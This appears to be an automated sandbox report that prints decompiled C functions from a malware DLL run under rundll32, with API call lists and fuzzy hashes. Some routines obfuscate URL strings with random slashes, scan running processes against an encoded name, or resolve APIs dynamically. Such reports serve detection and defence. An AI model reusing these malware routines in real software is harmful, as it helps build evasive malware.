Opcode Fuzzy Hash: 72d9eb6ea2bdfb0f97a06b58dd6212382cacb5f7b1e2b23078ccc4ec6f59b8ea
Instruction Fuzzy Hash: B721C5B3D04219ABDB14AFE7D8848FE77ADFF58394B404425EA51A7100D734FD46ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 045E6643 Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E045E6643(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E045E7A71(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x045e664f
0x045e6653
0x045e6654
0x045e6655
0x045e6657
0x045e6659
0x045e665c
0x045e6661
0x045e66f8
0x045e66ff
0x045e66ff
0x045e666a
0x045e6671
0x045e6681
0x045e6681
0x045e6687
0x045e6689
0x045e668e
0x045e6697
0x045e669d
0x045e66a2
0x045e66ad
0x045e66b1
0x045e66b3
0x045e66b4
0x045e66bd
0x045e66c1
0x045e66d2
0x045e66c3
0x045e66c8
0x045e66cd
0x045e66dc
0x045e66dc
0x045e66b1
0x045e66e2
0x045e66e8
0x045e66e8
0x045e66f1
0x045e66f6
0x045e66f6
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 045E6671
lstrlenW.KERNEL32(?), ref: 045E66A7
memcpy.NTDLL(00000000,?,?,?), ref: 045E66C8
SysFreeString.OLEAUT32(?), ref: 045E66DC

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: b5935dcbade61e8702743441c2ef875ac85771e12e800338c56fdd8a7f0870d1
Instruction ID: c670dd1973d3521539afe708d8a569622dd32132a8af199d8796a039b457c351
Opcode Fuzzy Hash: b5935dcbade61e8702743441c2ef875ac85771e12e800338c56fdd8a7f0870d1
Instruction Fuzzy Hash: 8C21867590021AEFCB15DFA5D8849AEBBB8FF98354B5041A9E901D7300E730EA04EF50

Uniqueness

Uniqueness Score: -1.00%

Function 045E5454 Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E045E5454(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x45ea2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x45ea2f0; // 0x81376bd4
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x45ea2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x045e545c
0x045e545f
0x045e5465
0x045e547d
0x045e547f
0x045e5484
0x045e5486
0x045e5489
0x045e548b
0x045e548e
0x045e5490
0x045e5490
0x045e5492
0x045e549d
0x045e54a2
0x045e54b3
0x045e54bb
0x045e54c0
0x045e54c3
0x045e54c6
0x045e54c8
0x045e54cb
0x045e54ce
0x045e54ce
0x045e54d1
0x045e54dc
0x045e54e1
0x045e54eb

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,045E2314,00000000,?,775EC740,045E3831,00000000,04FF9600), ref: 045E545F
RtlAllocateHeap.NTDLL(00000000,?), ref: 045E5477
memcpy.NTDLL(00000000,04FF9600,-00000008,?,?,?,045E2314,00000000,?,775EC740,045E3831,00000000,04FF9600), ref: 045E54BB
memcpy.NTDLL(00000001,04FF9600,00000001,045E3831,00000000,04FF9600), ref: 045E54DC

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 5c9816fe2d5b2e37e4250463a52ce8c48a9ae3c44e0d8f1b9253f165c68a0e6f
Instruction ID: 08e500cf293fe91f9e727e738d96f902bcc0e0f9d4b8cea5f46bfd034961d369
Opcode Fuzzy Hash: 5c9816fe2d5b2e37e4250463a52ce8c48a9ae3c44e0d8f1b9253f165c68a0e6f
Instruction Fuzzy Hash: 9911CA72A00155BFD714CA6ADC84DAE7BA9FBC0361B050176F5049B241F7759E04E790

Uniqueness

Uniqueness Score: -1.00%

Function 045E5854 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E045E5854(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E045E5E6F(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x45ea348; // 0xa0d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x45eb4e0; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x45eb904; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E045E2058();
					_push( &_v64);
					if( *0x45ea100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E045E2058();
				}
				return _t28;
			}

0x045e5854
0x045e585b
0x045e5869
0x045e586d
0x045e5877
0x045e587c
0x045e5881
0x045e5886
0x045e5890
0x045e589a
0x045e589a
0x045e5892
0x045e5892
0x045e5892
0x045e5892
0x045e58a0
0x045e58a6
0x045e58a7
0x045e58aa
0x045e58ad
0x045e58b0
0x045e58b8
0x045e58c1
0x045e58c9
0x045e58c9
0x045e58cb
0x045e58cd
0x045e58cd
0x045e58d7

APIs

Part of subcall function 045E5E6F: SysAllocString.OLEAUT32(00000000), ref: 045E5EC9
Part of subcall function 045E5E6F: SysAllocString.OLEAUT32(0070006F), ref: 045E5EDD
Part of subcall function 045E5E6F: SysAllocString.OLEAUT32(00000000), ref: 045E5EEF

memset.NTDLL ref: 045E5877
GetLastError.KERNEL32 ref: 045E58C3

Strings

<, xrefs: 045E5886
@MqtNqt, xrefs: 045E58C3

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <$@MqtNqt
API String ID: 3736384471-349977332
Opcode ID: d74722153db1c1c661e5a66a1edba2ee4ca53e4b7529ece886bf7c9bc0ff4b8d
Instruction ID: 6fa439a7ea2f50888dfc45d5e4ba798f41e422c4cfdd2f48fad7eafa68ec0619
Opcode Fuzzy Hash: d74722153db1c1c661e5a66a1edba2ee4ca53e4b7529ece886bf7c9bc0ff4b8d
Instruction Fuzzy Hash: D3012D7190021CABDB18EFA6E884EAE7BB8BB48744F414425F904EB240E770A9059B91

Uniqueness

Uniqueness Score: -1.00%

Function 045E7256 Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E045E7256() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x45ea348; // 0xa0d5a8
						_t2 = _t9 + 0x45ebea8; // 0x73617661
						_push( &_v264);
						if( *0x45ea12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x045e7261
0x045e726b
0x045e726f
0x045e7279
0x045e72aa
0x045e7280
0x045e7285
0x045e7292
0x045e729b
0x045e72b2
0x045e729d
0x045e72a5
0x00000000
0x045e72a5
0x045e72b3
0x045e72b4
0x00000000
0x045e72b4
0x00000000
0x045e72ae
0x045e72ba
0x045e72bf

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 045E7266
Process32First.KERNEL32(00000000,?), ref: 045E7279
Process32Next.KERNEL32(00000000,?), ref: 045E72A5
CloseHandle.KERNEL32(00000000), ref: 045E72B4

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: a06cea7dd2b5e4cfa9b2504f8bcae268416699ccb4df46d7529d974000b45961
Instruction ID: e1b003aba23a5d5c1bacab8612e75008912951473b6e3dafaf3560dbb79c6bf4
Opcode Fuzzy Hash: a06cea7dd2b5e4cfa9b2504f8bcae268416699ccb4df46d7529d974000b45961
Instruction Fuzzy Hash: B8F096726001156BD729A677AC48DFF776DFBCD355F000051F945C7001F724E94AA6B1

Uniqueness

Uniqueness Score: -1.00%

Function 045E7571 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E7571(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x045e757b
0x045e757f
0x045e7594
0x045e7596
0x045e759b
0x045e75a1
0x045e75a3
0x045e75a8
0x045e75b3
0x045e75aa
0x045e75aa
0x045e75aa
0x045e75a8
0x045e75c1

APIs

memset.NTDLL ref: 045E757F
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,747581D0,00000000,00000000), ref: 045E7594
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 045E75A1
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,045E3897,00000000,?), ref: 045E75B3

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: f8ac28453a5310f0de34b4defac8efe2cbff2bed10ee3798a5791f81a21f6ccd
Instruction ID: 5275af9ddfc5318f984b16b00ccfe0436daebb423ef9860991b613c8dd55bd34
Opcode Fuzzy Hash: f8ac28453a5310f0de34b4defac8efe2cbff2bed10ee3798a5791f81a21f6ccd
Instruction Fuzzy Hash: EAF05EF5104308BFD324AF63ECC4C37BBACFB86298B11492EF54682501D775AC099AB0

Uniqueness

Uniqueness Score: -1.00%

Function 045E75C2 Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E75C2() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x45ea30c; // 0x2c0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x45ea35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x45ea30c; // 0x2c0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x45ea2d8; // 0x4c00000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x045e75c2
0x045e75c9
0x045e7613
0x045e7615
0x045e7615
0x045e75cd
0x045e75d3
0x045e75d8
0x045e75dc
0x045e75e2
0x045e75e9
0x00000000
0x00000000
0x045e75eb
0x045e75f0
0x00000000
0x00000000
0x00000000
0x045e75f0
0x045e75f2
0x045e75fa
0x045e75fd
0x045e75fd
0x045e7603
0x045e760a
0x045e760d
0x045e760d
0x00000000

APIs

SetEvent.KERNEL32(000002C0,00000001,045E394C), ref: 045E75CD
SleepEx.KERNEL32(00000064,00000001), ref: 045E75DC
CloseHandle.KERNEL32(000002C0), ref: 045E75FD
HeapDestroy.KERNEL32(04C00000), ref: 045E760D

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: d7a2706b9d528f9da8f71eb9f7243952c9c25c42d8c9c695429ecf1c846d97ab
Instruction ID: aaf5c30563884e660dc56b72384c4c7cbbd33c97cebdfc886ce825122f25690d
Opcode Fuzzy Hash: d7a2706b9d528f9da8f71eb9f7243952c9c25c42d8c9c695429ecf1c846d97ab
Instruction Fuzzy Hash: D4F012B160031197DB2C9B3BF848BA63BD9FB08761B440510BC15DA2C1CB28ED48F560

Uniqueness

Uniqueness Score: -1.00%

Function 045E3969 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E3969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E045E3D2E(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E045E1940(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E045E6BEB(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x45ea2d8, 0, _t25);
				}
				return _t22;
			}

0x045e3969
0x045e397a
0x045e397e
0x045e39d9
0x045e3980
0x045e3987
0x045e398f
0x045e3997
0x045e399b
0x045e39a1
0x045e39a9
0x045e39ac
0x045e39c4
0x045e39c4
0x045e39cf
0x045e39cf
0x045e39e0

APIs

Part of subcall function 045E3D2E: lstrlen.KERNEL32(?,00000000,04FF9DC0,00000000,045E695F,04FF9FE3,69B25F44,?,?,?,?,69B25F44,00000005,045EA00C,4D283A53,?), ref: 045E3D35
Part of subcall function 045E3D2E: mbstowcs.NTDLL ref: 045E3D5E
Part of subcall function 045E3D2E: memset.NTDLL ref: 045E3D70

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,04FF93CC), ref: 045E39A1
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,04FF93CC), ref: 045E39CF

Strings

Uqt, xrefs: 045E39CF

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Uqt
API String ID: 1500278894-2320327147
Opcode ID: e7a2f167665f9ce8fdbd2408d4006835f76e6cd49a2dda12b214f72285e20f4e
Instruction ID: c84f584f38918929496988cb91fbe9211ed7c755f19394a9de9310a5abdf16b9
Opcode Fuzzy Hash: e7a2f167665f9ce8fdbd2408d4006835f76e6cd49a2dda12b214f72285e20f4e
Instruction Fuzzy Hash: F8018F7620020ABBEB255FA6DC84EAF7B79FF84754F400026FA40DB161DB71E964E750

Uniqueness

Uniqueness Score: -1.00%

Function 045E534A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E045E534A(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0x45ea340;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0x45ea2f4; // 0x2c4
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0x45ea348; // 0xa0d5a8
				_t3 = _t12 + 0x45eb0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0x45ea348; // 0xa0d5a8
				_t4 = _t17 + 0x45eb9e0; // 0x6f577349
				 *0x45ea314 = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0x45ea340 = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}

0x045e534e
0x045e5353
0x045e5358
0x045e5360
0x045e5396
0x045e5398
0x045e539f
0x045e53a3
0x045e53a5
0x045e53a5
0x045e53a3
0x045e53a8
0x045e53ad
0x045e53ad
0x045e5362
0x045e5367
0x045e536e
0x045e5374
0x045e537a
0x045e5382
0x045e5387
0x045e538d
0x045e5394
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(4E52454B,00000001,?,?,045E7307,?,?), ref: 045E536E
GetProcAddress.KERNEL32(00000000,6F577349), ref: 045E5387

Strings

Nqt, xrefs: 045E5387

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Nqt
API String ID: 1646373207-806837294
Opcode ID: 64aa87d927d8c05aef7a1256a3985372f841702a1dce105ebb1f13f123e6b3aa
Instruction ID: 3f50a5b424b1e1dbd803720b70916d5dd2b3d65548205e2169ab71bdafd73e59
Opcode Fuzzy Hash: 64aa87d927d8c05aef7a1256a3985372f841702a1dce105ebb1f13f123e6b3aa
Instruction Fuzzy Hash: 83F0ECB1A0131AEBDB1CCFB7E945AA973ECFB096197500059E401DB101E778FE09AB50

Uniqueness

Uniqueness Score: -1.00%

Function 045E452E Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E045E452E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E045E7A71(_t2);
				if(_t34 != 0) {
					_t30 = E045E7A71(_t28);
					if(_t30 == 0) {
						E045E789E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E045E7ABF(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E045E7ABF(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x045e452e
0x045e4538
0x045e453a
0x045e4540
0x045e4540
0x045e4549
0x045e454d
0x045e4559
0x045e455d
0x045e45d1
0x045e455f
0x045e455f
0x045e4563
0x045e4568
0x045e456d
0x045e4587
0x045e4576
0x045e4576
0x045e457a
0x045e457d
0x045e4582
0x045e4582
0x045e458c
0x045e45b4
0x045e45ba
0x045e45bd
0x045e458e
0x045e4590
0x045e4598
0x045e45a3
0x045e45a8
0x045e45a8
0x045e45c4
0x045e45cb
0x045e45cc
0x045e45cc
0x045e455d
0x045e45dc

APIs

lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,045E2C92,?,?,?,?,00000102,045E5D46,?,?,747581D0), ref: 045E453A

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

Part of subcall function 045E7ABF: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,045E4568,00000000,00000001,00000001,?,?,045E2C92,?,?,?,?,00000102), ref: 045E7ACD
Part of subcall function 045E7ABF: StrChrA.SHLWAPI(?,0000003F,?,?,045E2C92,?,?,?,?,00000102,045E5D46,?,?,747581D0,00000000), ref: 045E7AD7

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,045E2C92,?,?,?,?,00000102,045E5D46,?), ref: 045E4598
lstrcpy.KERNEL32(00000000,00000000), ref: 045E45A8
lstrcpy.KERNEL32(00000000,00000000), ref: 045E45B4

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 509ebe3834014deb2aa7210c02eda4774731a0c699d9182d831996da60138d23
Instruction ID: 315aab45d3e2d83f8bf1cb9590992434956305ce08cb2fa30a5c078e80d9e17a
Opcode Fuzzy Hash: 509ebe3834014deb2aa7210c02eda4774731a0c699d9182d831996da60138d23
Instruction Fuzzy Hash: A321C3B6500256ABCB15AF76D844ABB7FA9BF4A294B044055F8049B200EB34EA01E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 045E262D Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E262D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E045E7A71(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x045e2642
0x045e2646
0x045e2650
0x045e2655
0x045e265a
0x045e265c
0x045e2664
0x045e2669
0x045e2677
0x045e267c
0x045e2686

APIs

lstrlenW.KERNEL32(004F0053,?,74715520,00000008,04FF93CC,?,045E627D,004F0053,04FF93CC,?,?,?,?,?,?,045E521B), ref: 045E263D
lstrlenW.KERNEL32(045E627D,?,045E627D,004F0053,04FF93CC,?,?,?,?,?,?,045E521B), ref: 045E2644

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

